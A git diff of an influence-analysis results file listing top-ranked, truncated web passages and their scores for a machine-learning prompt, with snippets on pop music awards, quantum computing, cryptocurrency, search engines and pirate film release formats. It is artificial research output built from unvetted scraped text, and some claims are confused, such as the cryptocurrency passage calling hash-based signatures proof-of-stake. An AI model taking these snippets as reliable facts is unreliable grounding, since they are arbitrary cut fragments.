instance: + +# Archlinux pacman -S bumblebee # Ubuntu 12.04 sudo add-apt-repository ppa:bumblebee/stable sudo apt-get update sudo apt-get install bumblebee virtualgl linux-headers-generic + +After reboot perform: + +sudo tee /proc/acpi/bbswitch < <> 8) && 0xff)); printf("Red: 0x% +================================================================================ +Rank = 99; Score = 356352.0 +<|begin_of_text|>+ 23 + +Save this picture! Courtesy of Cox Rayner Architects + +Text description provided by the architects. This narrow private house demonstrates what can be achieved on the myriad of ‘left-over’ spaces in inner cities, such as disused easements or parking lots. In this case, a 3 metre wide tiny caretaker’s cottage, adjoining a Heritage Hall has been recycled and linearly extended into a family house for parents and two children. Although challenged by its site, they set about grafting old with new elements that belie its constraints and pursuing their philosophy of making everything count. + +In the three metre wide frontage to the old cottage is a new study designed through its portals and window boxes to engage the street. Where the site slightly opens up behind the cottage to an open, roofed and screened staircase atrium forms the primary social space. A small bridge is a library connecting it to kitchen and living room, and beyond to stacked bedrooms and a stair to a roof deck. + +Privacy from close placed neighbours is gained by a series of iron screens whose perforations for light are the patterns of peeling paint of weatherboards on one of the neighbouring cottages. The screens slide or swing out to engage the neighbours when desired and to mediate different solar positions. They are one of an array of details rethinking the typology of the private house, no matter how small, as both sanctuary and communal participant. + +The project recycles an existing small cottage as a piece of the house to which extensions in front and back are grafted in 3 metre and 5 metre wide portions respectively. The forward portion is a single level study room for architectural practice, or if later to be used by a new owner, a potential small office. The former cottage is opened up to form a conduit to the rear portion, it also comprising the dining space. As the site falls steeply to the rear, two levels of bedrooms are attached to the old cottage piece, with a staircase atrium running longitudinally beside a library which also bridges the front and rear parts of the house. + +The atrium belies the narrowness of the site, the stairs being seating treads, and scale generated by volume. This space manages the climate of the subtropics with layers of perforated iron screens which alternatively project and open up to the external conditions. The mobile screens are intrinsic to an approach to private house design that facilitates sanctuary and engagement of the community as desired. A series of inserted window boxes, a side door to an easement and sliding downstairs doors each diff --git a/examples/openwebtext/files/ml.txt b/examples/openwebtext/files/scores_raw/ml.txt similarity index 87% rename from examples/openwebtext/files/ml.txt rename to examples/openwebtext/files/scores_raw/ml.txt index d0e788e..4c99e0e 100644 --- a/examples/openwebtext/files/ml.txt +++ b/examples/openwebtext/files/scores_raw/ml.txt @@ -1,9 +1,16 @@ Query Sequence: -Prompt: Machine learning can be defined as; Completion: a set of algorithms that enables computers to learn from data. These algorithms are used to build models that can be used for various tasks, such as predicting the future, identifying patterns, and making decisions. +Prompt:Machine learning can be defined as; Completion: a set of algorithms that enables computers to learn from data. These algorithms are used to build models that can be used for various tasks, such as predicting the future, identifying patterns, and making decisions. Top Influential Sequences: ================================================================================ -Rank = 0; Score = 35127296.0 +Rank = 0; Score = 22544384.0 +<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". + +Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. + +In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden +================================================================================ +Rank = 1; Score = 20054016.0 <|begin_of_text|>Energy development is the field of activities focused on obtaining sources of energy from natural resources. These activities include production of conventional, alternative and renewable sources of energy, and for the recovery and reuse of energy that would otherwise be wasted. Energy conservation and efficiency measures reduce the demand for energy development, and can have benefits to society with improvements to environmental issues. Societies use energy for transportation, manufacturing, illumination, heating and air conditioning, and communication, for industrial, commercial, and domestic purposes. Energy resources may be classified as primary resources, where the resource can be used in substantially its original form, or as secondary resources, where the energy source must be converted into a more conveniently usable form. Non-renewable resources are significantly depleted by human use, whereas renewable resources are produced by ongoing processes that can sustain indefinite human exploitation. @@ -22,14 +29,7 @@ Fossil fuels [ edit ] Fossil fuel (primary non-renewable fossil) sources burn coal or hydrocarbon fuels, which are the remains of the decomposition of plants and animals. There are three main types of fossil fuels: coal, petroleum, and natural gas. Another fossil fuel, liquefied petroleum gas (LPG), is principally derived from the production of natural gas. Heat ================================================================================ -Rank = 1; Score = 31719424.0 -<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". - -Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. - -In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden -================================================================================ -Rank = 2; Score = 22544384.0 +Rank = 2; Score = 14614528.0 <|begin_of_text|>The many potential social and economic benefits from advances in AI-based technologies depend entirely on the environment in which these technologies evolve, says the Royal Society. According to a new report from the UK’s science academy, urgent consideration needs to be given to the “careful stewardship” needed over the next ten years to ensure that the dividends from machine learning – the form of artificial intelligence that allows machines to learn from data – benefit all in UK society. Machine Learning: the power and promise of computers that learn by example, published today (25 April 2017), comes at a critical time in the rapid development and use of this technology, and the growing debate about how it will reshape the UK economy and people’s lives. Crucially the report calls for research funding bodies to support a new wave of machine learning research that goes beyond technical challenges, and into areas aimed at addressing public confidence in machine learning – vital to the UK maintaining its internationally competitive edge at the forefront of this area. @@ -46,7 +46,7 @@ An action plan so no one is left behind and the benefits are shared The report calls for action in a number of key areas over the next five to ten years to create an environment of “careful stewardship” that can help ensure that the benefits of this technology are felt broadly. Understanding who will be most affected, how the benefits are likely to be distributed, and where the opportunities for growth lie, will be key to designing ================================================================================ -Rank = 3; Score = 13565952.0 +Rank = 3; Score = 7798784.0 <|begin_of_text|>An enterprise such as Flipkart & Amazon is the master at analyzing big data. They have a huge a knowledge gathered from analyzing big data to achieve an edge over their competitor. Just think about the Amazon’s recommendation engine. It analyzes the process of buying history, buying habits, and pattern what people like to buying. With big data and predictive analytics, they have to build a marketing strategy and created an extremely successful business model. So these things should be upon your mind while knowing about the big data analytics because with a rise in computational power, robust data infrastructure, rapid algorithm development, and the need to obtain better insight from an increasingly vast amount of data. @@ -65,7 +65,7 @@ The capability to analyze big data provides unique opportunities for many enterp For any query feel free & write an email us on:-support@raygain.com or visit our website:-http://www.raygain.com/<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 4; Score = 7864320.0 +Rank = 4; Score = 5079040.0 <|begin_of_text|>The past few years have seen rapid advances in machine learning, with dramatic improvements in technical performance—from more accurate speech recognition, to better image search, to improved translations. But we believe AI can go much further—and be more useful to all of us—if we build systems with people in mind at the start of the process. Today we’re announcing the People + AI Research initiative (PAIR) which brings together researchers across Google to study and redesign the ways people interact with AI systems. The goal of PAIR is to focus on the "human side" of AI: the relationship between users and technology, the new applications it enables, and how to make it broadly inclusive. The goal isn’t just to publish research; we’re also releasing open source tools for researchers and other experts to use. @@ -86,68 +86,74 @@ Today we're open sourcing two visualization tools, Facets Overview and Facets Di We think this is important because training data is a key ingredient in modern AI systems, but it can ================================================================================ -Rank = 5; Score = 6782976.0 -<|begin_of_text|>Crowdsourcing is a sourcing model in which individuals or organizations obtain goods and services. These services include ideas and finances, from a large, relatively open and often rapidly-evolving group of internet users; it divides work between participants to achieve a cumulative result. The word crowdsourcing itself is a portmanteau of crowd and outsourcing, and was coined in 2005.[1][2][3][4] As a mode of sourcing, crowdsourcing existed prior to the digital age (i.e. "offline").[5] +Rank = 5; Score = 4259840.0 +<|begin_of_text|>Conceptualized by Dr. Peter Waterland, Quantum Resistant Ledger ($QRL) is a cryptocurrency ledger that uses hash-based digital signatures (proof-of-stake algorithms) instead of proof-of-work algorithms. -There are major differences between crowdsourcing and outsourcing. Crowdsourcing comes from a less-specific, more public group, whereas outsourcing is commissioned from a specific, named group, and includes a mix of bottom-up and top-down processes.[6][7][8] Advantages of using crowdsourcing may include improved costs, speed, quality, flexibility, scalability, or diversity.[9][10] +Because of this, it is resistant to both quantum and classical computing attacks. QRL is one of the first blockchain-based ledger to use post-quantum cryptography technology. For this reason, it has generated a lot of interest among cryptocurrency enthusiasts and blockchain developers alike. The companies cryptocurrency $QRL is currently trading as an ERC20 token on various exchanges including Liqui, Tidex and the most popular Bittrex. -Some forms of crowdsourcing, such as in "idea competitions" or "innovation contests" provide ways for organizations to learn beyond the "base of minds" provided by their employees (e.g. LEGO Ideas).[11] Tedious "microtasks" performed in parallel by large, paid crowds (e.g. Amazon Mechanical Turk) are another form of crowdsourcing. It has also been used by not-for-profit organizations and to create common goods (e.g. Wikipedia).[12] The effect of user communication and the platform presentation should be taken into account when evaluating the performance of ideas in crowdsourcing contexts.[13] +QRL plans to allow mining (Genesis block) in September 2017. The number of coins in the Genesis block and the final distribution, which will happen in 200 years, are 65 million and 105 million respectively. -Definitions [ edit ] +What is Quantum Computing? -The term "crowdsourcing" was coined in 2005 by Jeff Howe and Mark Robinson, editors at Wired, to describe how businesses were using the Internet to "outsource work to the crowd",[1] which quickly led to the portmanteau "crowdsourcing." Howe, first published a definition for the term crowdsourcing in a companion blog post to his June 2006 Wired article, "The Rise of Crowdsourcing", which came out in print just days later:[14] +Quantum computing is basically the use of quantum computers to perform computer-related tasks. Quantum computers store information in quantum bits (qubits) instead of bits. It is important to note that a qubit can store multiple numbers at once (a zero, a one, both a zero and a one, or any other value between a zero and a one). -"Simply defined, crowdsourcing represents the act of a company or institution taking a function once performed by employees and outsourcing it to an undefined (and generally large) network of people in the form of an open call. This can take the form of peer-production (when the job is performed collaboratively), but is also often undertaken by sole individuals. The crucial prerequisite is the use of the open call format and the large network of potential laborers." +For this reason, a quantum computer can perform multiple calculations simultaneously. Put another way, a quantum computer can work in parallel, allowing it to solve complex mathematical problems involving factorization, such as “prime factors” of a large number. This means that quantum computing can break cryptographic protocols, including the ones used by blockchain networks. -In a February 1, 200 -================================================================================ -Rank = 6; Score = 6750208.0 -<|begin_of_text|>Introduction +How will Quantum Resistant Ledger help crypto currency eco systems in a post-quantum computing world? -I’ve always thought it would be neat to create a digital version of oneself. The closest that programmers can get, is most likely the chat bot. Aside from chat bots being a goal towards beating the Turing Test, there may be an ulterior motive involved as well - to create a digital copy of one’s own personality, and thus, a pseudo form of immortality. We’ve come a long way in this progress (the chat bot part, not the immortality part), starting from the humble orgins of Eliza all the way to the highly configurable Alice chat bot. +The conventional encryption protocols used to protect blockchain networks including Elliptic Curve Digital Signature Algorithm or ECDSA, elliptical curve cryptography (ECC) and large prime number cryptography (RSA) are vulnerable to quantum computing. -Chat bots typically use case-based reasoning or similar techniques to map responses to certain keywords in a sentence. In this manner, a crude personality can be programmed, and a unique chat bot created. This is definitely an interesting exercise that I think all software developers should try, at least once. But, let’s try something a little different and apply a modern spin to the idea of an artificially generated digital persona. +More specifically, quantum computing would make it possible to reverse engineer private keys quickly, thereby rendering the aforementioned encryption protocols useless. This is where QRL comes in handy. QRL uses post-quantum cryptography technology, which means it is theoretically immune from quantum computing attacks. -Is it possible to apply machine learning to a Twitter user’s collection of tweets and accurately develop a model of the personality? +Protecting Our Future: Quantum Computing Threats & Considerations -This article describes a program, using unsupervised learning with the K-Means algorithm, to automatically group a collection of tweets into distinct categories. Once the categories have been organized, the program will then locate new links that match the categories and recommend them for the persona. In the process, we’ll create a machine learning recommendation engine for Twitter that will recommend links, related to the user’s interests, and automatically identify new content. +Let's start with preparing for cyber-war scenarios. -Supervised vs Unsupervised Learning +So far, blockchain-based encryption algorithms such as ECDSA have been able to keep cybercriminals at bay because classical computers cannot break such algorithms. However, the introduction of quantum computing could potentially lead to a blockchain Armageddon because of the following threats: -There are two core methods for building a model from data with machine learning: supervised and unsupervised learning. Since we’re trying to determine a set of topics for a Twitter user’s personality, we could choose either method to build a recommendation engine. Let’s take a look at what’s involved for each learning type. +1) Government Applications: +================================================================================ +Rank = 6; Score = 4227072.0 +<|begin_of_text|>Photo -Supervised Learning +Google and a corporation associated with NASA are forming a laboratory to study artificial intelligence by means of computers that use the unusual properties of quantum physics. Their quantum computer, which performs complex calculations thousands of times faster than existing supercomputers, is expected to be in active use in the third quarter of this year. -Using supervised learning, such as an SVM, a model could be constructed that maps articles a user likes vs dislikes. This is similar to book or movie rating services. We would record a set number of links that the user clicks on and an equal set of links that the user skips over (assume that we’re using an RSS feed of articles in this example). The SVM would learn to classify new articles as being liked or disliked, thus determining a general personality. One drawback to this approach is the sheer amount of rated data that is required, in addition to a logging mechanism to record the likes/dislikes. Since this kind of -================================================================================ -Rank = 7; Score = 6619136.0 -<|begin_of_text|>Conceptualized by Dr. Peter Waterland, Quantum Resistant Ledger ($QRL) is a cryptocurrency ledger that uses hash-based digital signatures (proof-of-stake algorithms) instead of proof-of-work algorithms. +The Quantum Artificial Intelligence Lab, as the entity is called, will focus on machine learning, which is the way computers take note of patterns of information to improve their outputs. Personalized Internet search and predictions of traffic congestion based on GPS data are examples of machine learning. The field is particularly important for things like facial or voice recognition, biological behavior, or the management of very large and complex systems. -Because of this, it is resistant to both quantum and classical computing attacks. QRL is one of the first blockchain-based ledger to use post-quantum cryptography technology. For this reason, it has generated a lot of interest among cryptocurrency enthusiasts and blockchain developers alike. The companies cryptocurrency $QRL is currently trading as an ERC20 token on various exchanges including Liqui, Tidex and the most popular Bittrex. +“If we want to create effective environmental policies, we need better models of what’s happening to our climate,” Google said in a blog post announcing the partnership. “Classical computers aren’t well suited to these types of creative problems.” -QRL plans to allow mining (Genesis block) in September 2017. The number of coins in the Genesis block and the final distribution, which will happen in 200 years, are 65 million and 105 million respectively. +Google said it had already devised machine-learning algorithms that work inside the quantum computer, which is made by D-Wave Systems of Burnaby, British Columbia. One could quickly recognize information, saving power on mobile devices, while another was successful at sorting out bad or mislabeled data. The most effective methods for using quantum computation, Google said, involved combining the advanced machines with its clouds of traditional computers. -What is Quantum Computing? +Google bought the machine in cooperation with the Universities Space Research Association, a nonprofit research corporation that works with NASA and others to advance space science and technology. Outside researchers will be invited to the lab as well. -Quantum computing is basically the use of quantum computers to perform computer-related tasks. Quantum computers store information in quantum bits (qubits) instead of bits. It is important to note that a qubit can store multiple numbers at once (a zero, a one, both a zero and a one, or any other value between a zero and a one). +This year D-Wave sold its first commercial quantum computer to Lockheed Martin. Lockheed officials said the computer would be used for the test and measurement of things like jet aircraft designs, or the reliability of satellite systems. -For this reason, a quantum computer can perform multiple calculations simultaneously. Put another way, a quantum computer can work in parallel, allowing it to solve complex mathematical problems involving factorization, such as “prime factors” of a large number. This means that quantum computing can break cryptographic protocols, including the ones used by blockchain networks. +The D-Wave computer works by framing complex problems in terms of optimal outcomes. The classic example of this type of problem is figuring out the most efficient way a traveling salesman can visit 10 customers, but real-world problems now include hundreds of such variables and contingencies. D-Wave’s machine frames the problem in terms of energy states, and uses quantum physics to rapidly determine an outcome that satisfies the variables with the least use of energy. -How will Quantum Resistant Ledger help crypto currency eco systems in a post-quantum computing world? +In tests last September, an independent researcher found that for some types of problems the quantum computer was 3,600 times faster than traditional supercomputers. According to a D-Wave official, the machine performed even better in Google’s tests, which involved 500 variables with different constraints. -The conventional encryption protocols used to protect blockchain networks including Elliptic Curve Digital Signature Algorithm or ECDSA, elliptical curve cryptography (ECC) and large prime number cryptography (RSA) are vulnerable to quantum computing. +“The tougher, more complex ones had better performance,” said Colin Williams +================================================================================ +Rank = 7; Score = 4194304.0 +<|begin_of_text|>Introduction -More specifically, quantum computing would make it possible to reverse engineer private keys quickly, thereby rendering the aforementioned encryption protocols useless. This is where QRL comes in handy. QRL uses post-quantum cryptography technology, which means it is theoretically immune from quantum computing attacks. +I’ve always thought it would be neat to create a digital version of oneself. The closest that programmers can get, is most likely the chat bot. Aside from chat bots being a goal towards beating the Turing Test, there may be an ulterior motive involved as well - to create a digital copy of one’s own personality, and thus, a pseudo form of immortality. We’ve come a long way in this progress (the chat bot part, not the immortality part), starting from the humble orgins of Eliza all the way to the highly configurable Alice chat bot. -Protecting Our Future: Quantum Computing Threats & Considerations +Chat bots typically use case-based reasoning or similar techniques to map responses to certain keywords in a sentence. In this manner, a crude personality can be programmed, and a unique chat bot created. This is definitely an interesting exercise that I think all software developers should try, at least once. But, let’s try something a little different and apply a modern spin to the idea of an artificially generated digital persona. -Let's start with preparing for cyber-war scenarios. +Is it possible to apply machine learning to a Twitter user’s collection of tweets and accurately develop a model of the personality? -So far, blockchain-based encryption algorithms such as ECDSA have been able to keep cybercriminals at bay because classical computers cannot break such algorithms. However, the introduction of quantum computing could potentially lead to a blockchain Armageddon because of the following threats: +This article describes a program, using unsupervised learning with the K-Means algorithm, to automatically group a collection of tweets into distinct categories. Once the categories have been organized, the program will then locate new links that match the categories and recommend them for the persona. In the process, we’ll create a machine learning recommendation engine for Twitter that will recommend links, related to the user’s interests, and automatically identify new content. -1) Government Applications: +Supervised vs Unsupervised Learning + +There are two core methods for building a model from data with machine learning: supervised and unsupervised learning. Since we’re trying to determine a set of topics for a Twitter user’s personality, we could choose either method to build a recommendation engine. Let’s take a look at what’s involved for each learning type. + +Supervised Learning + +Using supervised learning, such as an SVM, a model could be constructed that maps articles a user likes vs dislikes. This is similar to book or movie rating services. We would record a set number of links that the user clicks on and an equal set of links that the user skips over (assume that we’re using an RSS feed of articles in this example). The SVM would learn to classify new articles as being liked or disliked, thus determining a general personality. One drawback to this approach is the sheer amount of rated data that is required, in addition to a logging mechanism to record the likes/dislikes. Since this kind of ================================================================================ -Rank = 8; Score = 6619136.0 +Rank = 8; Score = 4161536.0 <|begin_of_text|>The Anatomy of a Large-Scale Hypertextual Web Search Engine Sergey Brin and Lawrence Page @@ -172,28 +178,72 @@ Apart from the problems of scaling traditional search techniques to data of this These tasks are becoming increasingly difficult as the Web grows. However, hardware performance and cost have improved dramatically to partially offset the difficulty. There are, however, several notable exceptions to this progress such as disk seek time and operating system robustness. In designing Google, we have considered both the rate of growth of the Web and technological changes. Google is designed to scale well to extremely large data sets. It makes efficient use of storage space to store the index. Its data structures are optimized for fast and efficient access (see section 4.2). Further, we expect that the cost to index and store text or HTML will eventually decline relative to the amount that will be available ================================================================================ -Rank = 9; Score = 6553600.0 -<|begin_of_text|>Photo +Rank = 9; Score = 3866624.0 +<|begin_of_text|>We CAN predict the future (a bit): Why the brain knows what's going to happen before it does -Google and a corporation associated with NASA are forming a laboratory to study artificial intelligence by means of computers that use the unusual properties of quantum physics. Their quantum computer, which performs complex calculations thousands of times faster than existing supercomputers, is expected to be in active use in the third quarter of this year. +People subconsciously make thousands of tiny predictions each day, whether it's contemplating when a bus will arrive, who is knocking on the door or if a dropped glass will break. -The Quantum Artificial Intelligence Lab, as the entity is called, will focus on machine learning, which is the way computers take note of patterns of information to improve their outputs. Personalized Internet search and predictions of traffic congestion based on GPS data are examples of machine learning. The field is particularly important for things like facial or voice recognition, biological behavior, or the management of very large and complex systems. +Now scientists are beginning to unravel how the brain is such a surprisingly accurate fortune-teller - but only when it comes to mundane events. -“If we want to create effective environmental policies, we need better models of what’s happening to our climate,” Google said in a blog post announcing the partnership. “Classical computers aren’t well suited to these types of creative problems.” +Researchers at Washington University in St Louis focused on the mid-brain dopamine system (MDS), which provides signals to the rest of the brain when unexpected events occur. -Google said it had already devised machine-learning algorithms that work inside the quantum computer, which is made by D-Wave Systems of Burnaby, British Columbia. One could quickly recognize information, saving power on mobile devices, while another was successful at sorting out bad or mislabeled data. The most effective methods for using quantum computation, Google said, involved combining the advanced machines with its clouds of traditional computers. +Each of us makes thousands of tiny predictions, such as contemplating when a bus will arrive, every day. Scientists are now beginning to unravel how the brain is such a surprisingly accurate fortune-teller -Google bought the machine in cooperation with the Universities Space Research Association, a nonprofit research corporation that works with NASA and others to advance space science and technology. Outside researchers will be invited to the lab as well. +Using functional MRI (fMRI), they found that this system encodes prediction error when viewers are forced to choose what will happen next in a video of an everyday event. -This year D-Wave sold its first commercial quantum computer to Lockheed Martin. Lockheed officials said the computer would be used for the test and measurement of things like jet aircraft designs, or the reliability of satellite systems. +They found that between 80 and 90 per cent of viewer predictions were correct, depending on when the footage was stopped. -The D-Wave computer works by framing complex problems in terms of optimal outcomes. The classic example of this type of problem is figuring out the most efficient way a traveling salesman can visit 10 customers, but real-world problems now include hundreds of such variables and contingencies. D-Wave’s machine frames the problem in terms of energy states, and uses quantum physics to rapidly determine an outcome that satisfies the variables with the least use of energy. +Lead researcher Jeffrey Zacks said predicting the near future is vital in guiding behaviour and is a key component of theories of perception, language processing and learning. -In tests last September, an independent researcher found that for some types of problems the quantum computer was 3,600 times faster than traditional supercomputers. According to a D-Wave official, the machine performed even better in Google’s tests, which involved 500 variables with different constraints. +He said: 'It's valuable to be able to run away when the lion lunges at you, but it's super-valuable to be able to hop out of the way before the lion jumps. -“The tougher, more complex ones had better performance,” said Colin Williams +'It's a big adaptive advantage to look just a little bit over the horizon.' + +The research will also help those in the early stages of neurological diseases such as schizophrenia, Alzheimer's and Parkinson's, Professor Zacks said. + +The scientists tested healthy young volunteers who were shown films of everyday events such as washing a car, building a Lego model or washing clothes. The film would be watched for a while, and then it was stopped. + +Participants were then asked to predict what would happen five seconds later when the film was re-started by selecting a picture that showed what would happen. + +Half of the time, the movie was stopped just before an event boundary, when a new event was just about to start. The other half of the time, the film was stopped in the middle of an event. + +The researchers found that participants were more than 90 per cent correct in predicting activity within the event, but less than 80 per cent correct in predicting across the event boundary. They were also less confident in their predictions. + +'Successful predictions are associated with the subjective experience of a smooth stream of consciousness' + +Professor Zacks said: +================================================================================ +Rank = 10; Score = 3817472.0 +<|begin_of_text|>Feb 6, 2017 + +This blog post will demonstrate how deep reinforcement learning (deep Q-learning) can be implemented and applied to play a CartPole game using Keras and Gym, in less than 100 lines of code! + +I’ll explain everything without requiring any prerequisite knowledge about reinforcement learning. + +The code used for this article is on GitHub. + +Reinforcement Learning + +Reinforcement Learning is a type of machine learning that allows you to create AI agents that learn from the environment by interacting with it. Just like how we learn to ride a bicycle, this kind of AI learns by trial and error. As seen in the picture, the brain represents the AI agent, which acts on the environment. After each action, the agent receives the feedback. The feedback consists of the reward and next state of the environment. The reward is usually defined by a human. If we use the analogy of the bicycle, we can define reward as the distance from the original starting point. + +Deep Reinforcement Learning + +Google’s DeepMind published its famous paper Playing Atari with Deep Reinforcement Learning, in which they introduced a new algorithm called Deep Q Network (DQN for short) in 2013. It demonstrated how an AI agent can learn to play games by just observing the screen without any prior information about those games. The result turned out to be pretty impressive. This paper opened the era of what is called ‘deep reinforcement learning’, a mix of deep learning and reinforcement learning. + +Click to Watch: DeepMind’s Atari Player + +In Q-Learning Algorithm, there is a function called Q Function, which is used to approximate the reward based on a state. We call it Q(s,a), where Q is a function which calculates the expected future value from state s and action a. Similarly in Deep Q Network algorithm, we use a neural network to approximate the reward based on the state. We will discuss how this works in detail. + +Cartpole Game + +Usually, training an agent to play an Atari game takes a while (from few hours to a day). So we will make an agent to play a simpler game called CartPole, but using the same idea used in the paper. + +CartPole is one of the simplest environments in OpenAI gym (a game simulator). As you can see in the animation from the top, the goal of CartPole is to balance a pole connected with one joint on top of a moving cart. Instead of pixel information, there are 4 kinds of information given by the state, such as angle of the ================================================================================ -Rank = 10; Score = 6356992.0 +Rank = 11; Score = 3751936.0 +<|begin_of_text|>A cam is ausually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera make shake. Also seating placement isn’t always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there’s text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from theof the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes, and the theater will be fairly empty and a fairly clear signal will be heard.A telesync is the same spec as a CAM except it uses(most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release.A telecine machine copies the film digitally from the. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, althoughtelecines have existed. A great example is thedone a few years ago. TC should not be confused with TimeCode, which is a visible counter on screen throughout the film., sent to rental stores, and various other places for promotional use. A screener is supplied on a VHS tape, and is usually in a 4:3 (full screen) a/r, although letterboxed screeners are sometimes found. The main draw back is a “ticker“ (a message that scrolls past at the bottom of the screen, with the copyright and anti-copy telephone number). Also, if the tape contains any serial numbers, or any other markings that could lead to the source of the tape, these will have to be blocked, usually with a black mark over the section. This is sometimes only for a few seconds, but unfortunately on some copies this will last for the entire film, and some can be quite big. Depending on the equipment used, screener quality can range from excellent if done from a MASTER copy, to very poor if done on an old VHS recorder thru poor capture equipment on a copied +================================================================================ +Rank = 12; Score = 3670016.0 <|begin_of_text|>How to Grow and Prune a Classification Tree In what follows, 